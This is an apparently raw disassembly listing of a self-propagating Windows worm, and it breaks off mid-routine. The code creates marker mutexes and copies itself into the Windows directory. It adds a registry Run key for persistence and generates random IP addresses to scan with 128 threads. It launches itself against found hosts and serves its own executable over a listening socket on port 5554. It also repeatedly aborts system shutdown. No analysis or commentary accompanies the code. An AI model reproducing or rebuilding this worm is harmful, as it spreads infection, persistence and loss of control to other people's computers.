push eax
push ds:off_4068E4
push ebx
call esi ; send
lea eax, [ebp+var_60]
push eax
call sub_4011D5
mov ebx, eax
pop ecx
test ebx, ebx
jz loc_401DB9
push 10h
lea eax, [ebp+var_28]
push 0
push eax
call sub_4021B0
add esp, 0Ch
mov [ebp+var_28], 2
push edi
call ds:dword_4050F4 ; htons
push 0
push 1
push 2
mov [ebp+var_26], ax
mov [ebp+var_24], ebx
call ds:dword_4050F8 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
mov [ebp+var_C], ebx
jz loc_401DB9
lea eax, [ebp+var_28]
push 10h
push eax
push ebx
call ds:dword_4050FC ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_401D44
push ebx
call ds:dword_40511C ; closesocket
jmp short loc_401DB9
; ---------------------------------------------------------------------------
loc_401D44: ; CODE XREF: sub_401B08+231�j
lea eax, [ebp+var_8E4]
push 400h
push eax
push 0
call ds:dword_405034 ; GetModuleFileNameA
lea eax, [ebp+var_8E4]
push 0
push eax
call ds:dword_405030 ; _lopen
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jz short loc_401DB9
lea eax, [ebp+var_2]
push offset dword_406F38
push eax
call sub_402720
mov ebx, ds:dword_40502C
pop ecx
pop ecx
lea eax, [ebp+var_2]
push 1
push eax
push [ebp+var_8]
loc_401D8E: ; CODE XREF: sub_401B08+2A6�j
call ebx ; _hread
cmp eax, 1
jnz short loc_401DB0
and [ebp+var_1], 0
push 0
push eax
lea eax, [ebp+var_2]
push eax
push [ebp+var_C]
call esi ; send
lea eax, [ebp+var_2]
push 1
push eax
push [ebp+var_8]
jmp short loc_401D8E
; ---------------------------------------------------------------------------
loc_401DB0: ; CODE XREF: sub_401B08+28B�j
push [ebp+var_8]
call ds:dword_40501C ; _lclose
loc_401DB9: ; CODE XREF: sub_401B08+1DD�j
; sub_401B08+21B�j ...
push [ebp+var_C]
call ds:dword_40511C ; closesocket
push 0
push ds:off_4068DC
call sub_402210
pop ecx
push eax
push ds:off_4068DC
loc_401DD7: ; CODE XREF: sub_401B08+197�j
push [ebp+arg_0]
jmp short loc_401E12
; ---------------------------------------------------------------------------
loc_401DDC: ; CODE XREF: sub_401B08+1B1�j
lea eax, [ebp+var_4E4]
push offset aQuit ; "QUIT"
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz short loc_401DFC
push ebx
call ds:dword_40511C ; closesocket
jmp short loc_401E14
; ---------------------------------------------------------------------------
loc_401DFC: ; CODE XREF: sub_401B08+2E9�j
push 0
push ds:off_4068DC
call sub_402210
pop ecx
push eax
push ds:off_4068DC
loc_401E11: ; CODE XREF: sub_401B08+8A�j
; sub_401B08+BB�j
push ebx
loc_401E12: ; CODE XREF: sub_401B08+2D2�j
call esi ; send
loc_401E14: ; CODE XREF: sub_401B08+2F2�j
cmp [ebp+var_10], 0
jg loc_401B43
push [ebp+arg_0]
call ds:dword_40511C ; closesocket
pop edi
pop esi
loc_401E29: ; CODE XREF: sub_401B08+10�j
xor eax, eax
pop ebx
leave
retn 4
sub_401B08 endp
; =============== S U B R O U T I N E =======================================
sub_401E30 proc near ; CODE XREF: sub_401B08+119�p
; sub_401B08+129�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
xor edi, edi
loc_401E38: ; CODE XREF: sub_401E30+13�j
mov al, [esi]
cmp al, 20h
jz short loc_401E42
cmp al, 9
jnz short loc_401E45
loc_401E42: ; CODE XREF: sub_401E30+C�j
inc esi
jmp short loc_401E38
; ---------------------------------------------------------------------------
loc_401E45: ; CODE XREF: sub_401E30+10�j
; sub_401E30+2E�j
movsx eax, byte ptr [esi]
push eax
call sub_402810
test eax, eax
pop ecx
jz short loc_401E60
movsx ecx, byte ptr [esi]
lea eax, [edi+edi*4]
inc esi
lea edi, [ecx+eax*2-30h]
jmp short loc_401E45
; ---------------------------------------------------------------------------
loc_401E60: ; CODE XREF: sub_401E30+21�j
mov eax, edi
pop edi
pop esi
retn
sub_401E30 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E65 proc near ; DATA XREF: sub_402029+79�o
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push esi
xor esi, esi
push edi
push esi
push 1
push 2
call ds:dword_4050F8 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_401E89
loc_401E81: ; CODE XREF: sub_401E65+63�j
pop edi
xor eax, eax
pop esi
leave
retn 4
; ---------------------------------------------------------------------------
loc_401E89: ; CODE XREF: sub_401E65+1A�j
push 15B2h
mov [ebp+var_14], 2
call ds:dword_4050F4 ; htons
mov [ebp+var_12], ax
lea eax, [ebp+var_14]
push 10h
push eax
push edi
mov [ebp+var_10], esi
call ds:dword_405118 ; bind
cmp eax, 0FFFFFFFFh
jz short loc_401EC1
push 5
push edi
call ds:dword_405100 ; listen
cmp eax, 0FFFFFFFFh
jnz short loc_401ECA
loc_401EC1: ; CODE XREF: sub_401E65+4C�j
push edi
call ds:dword_40511C ; closesocket
jmp short loc_401E81
; ---------------------------------------------------------------------------
loc_401ECA: ; CODE XREF: sub_401E65+5A�j
; sub_401E65+89�j
push esi
push esi
push edi
call ds:dword_4050E8 ; accept
lea ecx, [ebp+var_4]
push ecx
push esi
push eax
push offset sub_401B08
push esi
push esi
call ds:dword_405038 ; CreateThread
push 19h
call ds:dword_405028 ; Sleep
jmp short loc_401ECA
sub_401E65 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_401EF0 proc near ; DATA XREF: sub_402029+8D�o
var_454 = byte ptr -454h
var_438 = byte ptr -438h
var_400 = byte ptr -400h
sub esp, 454h
push ebx
push ebp
mov ebp, ds:dword_4050E0
push esi
push edi
mov esi, 0FFh
loc_401F05: ; CODE XREF: sub_401EF0+134�j
lea eax, [esp+464h+var_438]
push eax
call sub_4010D2
pop ecx
lea eax, [esp+464h+var_438]
push eax
call ds:dword_40510C ; inet_addr
movsx edi, al
test edi, edi
movsx ebx, ah
jge short loc_401F2B
add edi, 100h
loc_401F2B: ; CODE XREF: sub_401EF0+33�j
test ebx, ebx
jge short loc_401F35
add ebx, 100h
loc_401F35: ; CODE XREF: sub_401EF0+3D�j
call sub_401000
push 1Fh
cdq
pop ecx
idiv ecx
cmp edx, 0Fh
jle short loc_401F92
call sub_401000
push 1Fh
cdq
pop ecx
idiv ecx
cmp edx, 0Fh
jle short loc_401F78
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
jmp short loc_401F8F
; ---------------------------------------------------------------------------
loc_401F78: ; CODE XREF: sub_401EF0+63�j
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
push ebx
loc_401F8F: ; CODE XREF: sub_401EF0+86�j
push edi
jmp short loc_401FBE
; ---------------------------------------------------------------------------
loc_401F92: ; CODE XREF: sub_401EF0+53�j
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
loc_401FBE: ; CODE XREF: sub_401EF0+A0�j
lea eax, [esp+474h+var_454]
push offset aI_I_I_I ; "%i.%i.%i.%i"
push eax
call ebp ; wsprintfA
add esp, 18h
lea eax, [esp+464h+var_454]
push eax
call sub_401153
cmp al, 1
pop ecx
jnz short loc_40201C
lea eax, [esp+464h+var_400]
push 400h
push eax
push 0
call ds:dword_405034 ; GetModuleFileNameA
lea eax, [esp+464h+var_400]
push offset asc_406A7C ; " "
push eax
call sub_402730
lea eax, [esp+46Ch+var_454]
push eax
lea eax, [esp+470h+var_400]
push eax
call sub_402730
add esp, 10h
lea eax, [esp+464h+var_400]
push 0
push eax
call ds:dword_40503C ; WinExec
loc_40201C: ; CODE XREF: sub_401EF0+EA�j
push 19h
call ds:dword_405028 ; Sleep
jmp loc_401F05
sub_401EF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402029 proc near ; CODE XREF: sub_40283E+C9�p
var_14 = dword ptr -14h
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
mov edi, ds:dword_405048
xor esi, esi
push offset aJobaka3 ; "Jobaka3"
push esi
push esi
call edi ; CreateMutexA
call ds:dword_405044 ; GetTickCount
push eax
call sub_40101E
call sub_401028
push [ebp+arg_8]
call sub_402210
pop ecx
test eax, eax
pop ecx
jbe short loc_402072
push [ebp+arg_8]
call sub_401A84
pop ecx
push 1
pop eax
loc_40206C: ; CODE XREF: sub_402029+6A�j
pop edi
pop esi
leave
retn 10h
; ---------------------------------------------------------------------------
loc_402072: ; CODE XREF: sub_402029+35�j
push 1
call sub_4020D7
mov [esp+14h+var_14], offset aJumpallsnlstil ; "JumpallsNlsTillt"
push esi
push esi
call edi ; CreateMutexA
call ds:dword_405040 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_402095
xor eax, eax
jmp short loc_40206C
; ---------------------------------------------------------------------------
loc_402095: ; CODE XREF: sub_402029+66�j
mov edi, ds:dword_405038
lea eax, [ebp+var_4]
push ebx
push eax
push esi
push esi
push offset sub_401E65
push esi
push esi
call edi ; CreateThread
mov ebx, 80h
loc_4020B0: ; CODE XREF: sub_402029+97�j
lea eax, [ebp+var_8]
push eax
push esi
push esi
push offset sub_401EF0
push esi
push esi
call edi ; CreateThread
dec ebx
jnz short loc_4020B0
pop ebx
loc_4020C3: ; CODE XREF: sub_402029+AC�j
push esi
call ds:dword_405000 ; AbortSystemShutdownA
push 0BB8h
call ds:dword_405028 ; Sleep
jmp short loc_4020C3
sub_402029 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4020D7 proc near ; CODE XREF: sub_402029+4B�p
var_824 = byte ptr -824h
var_425 = byte ptr -425h
var_424 = byte ptr -424h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 824h
push esi
mov esi, 400h
lea eax, [ebp+var_824]
push esi
push eax
push 0
call ds:dword_405034 ; GetModuleFileNameA
lea eax, [ebp+var_424]
push esi
push eax
call ds:dword_405050 ; GetWindowsDirectoryA
lea eax, [ebp+var_424]
push eax
call sub_402210
cmp [ebp+eax+var_425], 5Ch
pop ecx
pop esi
jz short loc_40212F
lea eax, [ebp+var_424]
push offset asc_406ACC ; "\\"
push eax
call sub_402730
pop ecx
pop ecx
loc_40212F: ; CODE XREF: sub_4020D7+43�j
push ds:off_4068C8
lea eax, [ebp+var_424]
push eax
call sub_402730
cmp [ebp+arg_0], 0
pop ecx
pop ecx
jz short loc_40215F
lea eax, [ebp+var_424]
push 0
push eax
lea eax, [ebp+var_824]
push eax
call ds:dword_40504C ; CopyFileA
loc_40215F: ; CODE XREF: sub_4020D7+70�j
lea eax, [ebp+var_4]
push eax
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call ds:dword_405004 ; RegOpenKeyA
lea eax, [ebp+var_424]
push eax
call sub_402210
pop ecx
push eax
lea eax, [ebp+var_424]
push eax
push 1
push 0
push ds:off_4068C8
push [ebp+var_4]
call ds:dword_405008 ; RegSetValueExA
push [ebp+var_4]
call ds:dword_40500C ; RegCloseKey
leave
retn
sub_4020D7 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4021B0 proc near ; CODE XREF: sub_401153+10�p
; sub_401153+40�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_402203
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_4021F7
neg ecx
and ecx, 3
jz short loc_4021D9
sub edx, ecx
loc_4021D3: ; CODE XREF: sub_4021B0+27�j
mov [edi], al
inc edi
dec ecx
jnz short loc_4021D3
loc_4021D9: ; CODE XREF: sub_4021B0+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_4021F7
rep stosd
test edx, edx
jz short loc_4021FD
loc_4021F7: ; CODE XREF: sub_4021B0+18�j
; sub_4021B0+3F�j ...
mov [edi], al
inc edi
dec edx
jnz short loc_4021F7
loc_4021FD: ; CODE XREF: sub_4021B0+45�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_402203: ; CODE XREF: sub_4021B0+A�j
mov eax, [esp+arg_0]
retn
sub_4021B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402210 proc near ; CODE XREF: sub_401210+3E�p
; sub_401210+55�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_402230
loc_40221C: ; CODE XREF: sub_402210+19�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_402263
test ecx, 3
jnz short loc_40221C
add eax, 0
loc_402230: ; CODE XREF: sub_402210+A�j
; sub_402210+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_402230
mov eax, [ecx-4]
test al, al
jz short loc_402281
test ah, ah
jz short loc_402277
test eax, 0FF0000h
jz short loc_40226D
test eax, 0FF000000h
jz short loc_402263
jmp short loc_402230
; ---------------------------------------------------------------------------
loc_402263: ; CODE XREF: sub_402210+11�j
; sub_402210+4F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_40226D: ; CODE XREF: sub_402210+48�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_402277: ; CODE XREF: sub_402210+41�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_402281: ; CODE XREF: sub_402210+3D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_402210 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402290 proc near ; CODE XREF: sub_401398+59�p
; sub_401398+78�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_4022B0
cmp edi, eax
jb loc_402428
loc_4022B0: ; CODE XREF: sub_402290+16�j
test edi, 3
jnz short loc_4022CC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4022EC
rep movsd
jmp ds:off_4023D8[edx*4]
; ---------------------------------------------------------------------------
loc_4022CC: ; CODE XREF: sub_402290+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_4022E4
and eax, 3
add ecx, eax
jmp dword ptr ds:loc_4022EC+4[eax*4]
; ---------------------------------------------------------------------------
loc_4022E4: ; CODE XREF: sub_402290+46�j
jmp dword ptr ds:loc_4023E8[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4022EC: ; CODE XREF: sub_402290+31�j
; sub_402290+8E�j ...
jmp ds:off_40236C[ecx*4]
; ---------------------------------------------------------------------------
db 90h
dd offset loc_402300
dd offset loc_40232C
; ---------------------------------------------------------------------------
push eax
and eax, [eax+0]
loc_402300: ; DATA XREF: sub_402290+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_4022EC
rep movsd
jmp ds:off_4023D8[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_40232C: ; DATA XREF: sub_402290+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_4022EC
rep movsd
jmp ds:off_4023D8[edx*4]
; ---------------------------------------------------------------------------
align 10h
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_4022EC
rep movsd
jmp ds:off_4023D8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_40236C dd offset loc_4023CF ; DATA XREF: sub_402290:loc_4022EC�r
dd offset loc_4023BC
dd offset loc_4023B4
dd offset loc_4023AC
dd offset loc_4023A4
dd offset loc_40239C
dd offset loc_402394
dd offset loc_40238C
; ---------------------------------------------------------------------------
loc_40238C: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_402394: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_40239C: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_4023A4: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_4023AC: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_4023B4: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_4023BC: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4023CF: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290:off_40236C�o
jmp ds:off_4023D8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_4023D8 dd offset loc_4023E8 ; DATA XREF: sub_402290+35�r
; sub_402290+92�r ...
dd offset loc_4023F0
dd offset loc_4023FC
dd offset loc_402410
; ---------------------------------------------------------------------------
loc_4023E8: ; CODE XREF: sub_402290+35�j
; sub_402290+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_4023F0: ; CODE XREF: sub_402290+35�j
; sub_402290+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4023FC: ; CODE XREF: sub_402290+35�j
; sub_402290+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_402410: ; CODE XREF: sub_402290+35�j
; sub_402290+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_402428: ; CODE XREF: sub_402290+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_40245C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_402450
std
rep movsd
cld
jmp ds:off_402570[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_402450: ; CODE XREF: sub_402290+1B1�j
; sub_402290+208�j ...
neg ecx
jmp ds:off_402520[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_40245C: ; CODE XREF: sub_402290+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_402474
and eax, 3
sub ecx, eax
jmp dword ptr ds:loc_402474+4[eax*4]
; ---------------------------------------------------------------------------
loc_402474: ; CODE XREF: sub_402290+1D6�j
; DATA XREF: sub_402290+1DD�r
jmp ds:off_402570[ecx*4]
; ---------------------------------------------------------------------------
align 4
mov [eax+eax*2], ah
add [eax-2FFFBFDCh], ch
and al, 40h
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_402450
std
rep movsd
cld
jmp ds:off_402570[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_402450
std
rep movsd
cld
jmp ds:off_402570[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_402450
std
rep movsd
cld
jmp ds:off_402570[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_402524
dd offset loc_40252C
dd offset loc_402534
dd offset loc_40253C
dd offset loc_402544
dd offset loc_40254C
dd offset loc_402554
off_402520 dd offset loc_402567 ; DATA XREF: sub_402290+1C2�r
; ---------------------------------------------------------------------------
loc_402524: ; DATA XREF: sub_402290+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_40252C: ; DATA XREF: sub_402290+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_402534: ; DATA XREF: sub_402290+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_40253C: ; DATA XREF: sub_402290+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_402544: ; DATA XREF: sub_402290+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_40254C: ; DATA XREF: sub_402290+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_402554: ; DATA XREF: sub_402290+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_402567: ; CODE XREF: sub_402290+1C2�j
; DATA XREF: sub_402290:off_402520�o
jmp ds:off_402570[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_402570 dd offset loc_402580 ; DATA XREF: sub_402290+1B7�r
; sub_402290:loc_402474�r ...
dd offset loc_402588
dd offset loc_402598
dd offset loc_4025AC
; ---------------------------------------------------------------------------
loc_402580: ; CODE XREF: sub_402290+1B7�j
; sub_402290:loc_402474�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_402588: ; CODE XREF: sub_402290+1B7�j
; sub_402290:loc_402474�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_402598: ; CODE XREF: sub_402290+1B7�j
; sub_402290:loc_402474�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4025AC: ; CODE XREF: sub_402290+1B7�j
; sub_402290:loc_402474�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_402290 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4025D0 proc near ; CODE XREF: sub_40159E+8�p
; sub_40371C+DF�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_4025F0
loc_4025DC: ; CODE XREF: sub_4025D0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_4025DC
loc_4025F0: ; CODE XREF: sub_4025D0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_4025D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402600 proc near ; CODE XREF: sub_401A84+2D�p
; sub_401A84+50�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_40267A
mov dh, [ecx+1]
test dh, dh
jz short loc_402667
loc_402618: ; CODE XREF: sub_402600+52�j
; sub_402600+65�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
inc esi
cmp al, dl
jz short loc_40263A
test al, al
jz short loc_402634
loc_402629: ; CODE XREF: sub_402600+32�j
mov al, [esi]
inc esi
loc_40262C: ; CODE XREF: sub_402600+3F�j
cmp al, dl
jz short loc_40263A
test al, al
jnz short loc_402629
loc_402634: ; CODE XREF: sub_402600+27�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40263A: ; CODE XREF: sub_402600+23�j
; sub_402600+2E�j
mov al, [esi]
inc esi
cmp al, dh
jnz short loc_40262C
lea edi, [esi-1]
loc_402644: ; CODE XREF: sub_402600+63�j
mov ah, [ecx+2]
test ah, ah
jz short loc_402673
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_402618
mov al, [ecx+3]
test al, al
jz short loc_402673
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_402644
jmp short loc_402618
; ---------------------------------------------------------------------------
loc_402667: ; CODE XREF: sub_402600+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp sub_402996
; ---------------------------------------------------------------------------
loc_402673: ; CODE XREF: sub_402600+49�j
; sub_402600+59�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_40267A: ; CODE XREF: sub_402600+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_402600 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402680 proc near ; CODE XREF: sub_401B08+103�p
; sub_401B08+14C�p
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
push 8
xor eax, eax
pop ecx
lea edi, [ebp+var_20]
rep stosd
push 7
pop edi
loc_402699: ; CODE XREF: sub_402680+32�j
mov dl, [esi]
mov bl, 1
movzx ecx, dl
mov eax, ecx
and ecx, edi
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_20]
or [eax], bl
inc esi
test dl, dl
jnz short loc_402699
mov edx, [ebp+arg_0]
test edx, edx
jnz short loc_4026C1
mov edx, ds:dword_406F3C
loc_4026C1: ; CODE XREF: sub_402680+39�j
; sub_402680+5F�j
mov al, [edx]
push 1
movzx esi, al
mov ecx, esi
pop ebx
and ecx, edi
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test bl, cl
jz short loc_4026E1
test al, al
jz short loc_4026E1
inc edx
jmp short loc_4026C1
; ---------------------------------------------------------------------------
loc_4026E1: ; CODE XREF: sub_402680+58�j
; sub_402680+5C�j
mov ebx, edx
loc_4026E3: ; CODE XREF: sub_402680+81�j
mov al, [edx]
test al, al
jz short loc_402707
movzx esi, al
mov ecx, esi
push 1
and ecx, edi
pop eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test al, cl
jnz short loc_402703
inc edx
jmp short loc_4026E3
; ---------------------------------------------------------------------------
loc_402703: ; CODE XREF: sub_402680+7E�j
and byte ptr [edx], 0
inc edx
loc_402707: ; CODE XREF: sub_402680+67�j
mov eax, ebx
pop edi
sub eax, edx
pop esi
neg eax
sbb eax, eax
mov ds:dword_406F3C, edx
and eax, ebx
pop ebx
leave
retn
sub_402680 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402720 proc near ; CODE XREF: sub_401B08+E9�p
; sub_401B08+270�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_402791
sub_402720 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402730 proc near ; CODE XREF: sub_401EF0+108�p
; sub_401EF0+117�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_40274C
loc_40273D: ; CODE XREF: sub_402730+1A�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_40277F
test ecx, 3
jnz short loc_40273D
loc_40274C: ; CODE XREF: sub_402730+B�j
; sub_402730+32�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_40274C
mov eax, [ecx-4]
test al, al
jz short loc_40278E
test ah, ah
jz short loc_402789
test eax, 0FF0000h
jz short loc_402784
test eax, 0FF000000h
